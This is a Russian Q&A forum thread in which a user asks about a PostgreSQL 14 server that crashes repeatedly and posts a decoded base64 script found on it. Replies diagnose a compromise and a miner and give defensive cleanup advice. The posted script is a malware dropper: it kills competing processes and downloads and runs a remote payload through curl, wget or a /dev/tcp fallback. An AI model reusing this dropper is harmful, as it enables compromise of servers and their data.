Как исправить частое хаотичное выключение postgresql 14?

Question

[yunfachi]

лог (

если декодировать "дичь в base64", то получится

#!/bin/bash
pkill -f zsvc
pkill -f pdefenderd
pkill -f updatecheckerd

function __curl() {
  read proto server path <<<$(echo ${1//// })
  DOC=/${path// //}
  HOST=${server//:*}
  PORT=${server//*:}
  [[ x"${HOST}" == x"${PORT}" ]] && PORT=80

  exec 3<>/dev/tcp/${HOST}/$PORT
  echo -en "GET ${DOC} HTTP/1.0\r\nHost: ${HOST}\r\n\r\n" >&3
  (while read line; do
   [[ "$line" == $'\r' ]] && break
  done && cat) <&3
  exec 3>&-
}

if [ -x "$(command -v curl)" ]; then
  curl 1.2.3.4:99999/pg.sh|bash
elif [ -x "$(command -v wget)" ]; then
  wget -q -O- 1.2.3.4:99999/pg.sh|bash
else
  __curl http://1.2.3.4:99999/pg2.sh|bash
fi

Cпустя 15м-12ч postgresql полностью выключается и приходится его перезапускать, что не очень удобно делать по несколько раз в день. Скорее всего я накосячил где-то в конфиге, но мне больше интересно, откуда эта "дичь в base64", и почему при попытке запуститься она крашит бд

дополнение: это нормально, что эта "дичь в base64" скачивает еще более странную дичь?

Comments

[Everything_is_not_so_bad]

Поздравляю, твой сервер скомпрометирован

[yunfachi]

Как я понимаю, единственный выход - это снести весь сервер и поменять все пароли?

[Zerg89]

yunfachi, нетолько пароли но и токены доступа из вне да и дату не надо выставлять наружу если сильно надо завернуть в впн

[aleks-th]

По хорошему скачать свои данные,
дропнуть сервер, я бы всю систему с нуля ставил, с новыми паролями и ключами.

поставить сервер заново.

Проверить свои данные и только после этого их залить

Answer 1

[XEHKOK]

Поздравляю с Майнером, система однозначно была скомпрометирована, вот гайд по устранению этого майнера: https://habr.com/ru/articles/582830/
А вообще лучше снести систему и накатить все по новой, скорее всего вы не заметили но базу вашу почистили создали там таблицу read me с просьбой пополнить криптокошелек и тогда восстановят данные, если это продовый сервер то мониторьте каналы ТГ по сливам на наличие ваших данных в сливах.
Удачи вам, и закрытых портов для ваших сервисов)

Answer 2

[Вадим]

Когда поставите новую систему, если уж нужно будет вести трафик через интернет, то хотя бы разрешите входящий только с определенных IP адресов. Например с IP на котором сидит ваш backend и c IP вашего VPN если он есть, конечно. Ваши персональный IP скорее всего постоянно меняется. Используйте ssh ключи, для захода на ваши сервера, не пароли

Answer 3

[ky0]

Похакали вас, батенька. Как обычно, рекомендую не грузиться попытками чистки - а просто развернуть свежую систему, на этот раз не выставляя её голой попой в интернет и накатить на неё бэкап БД.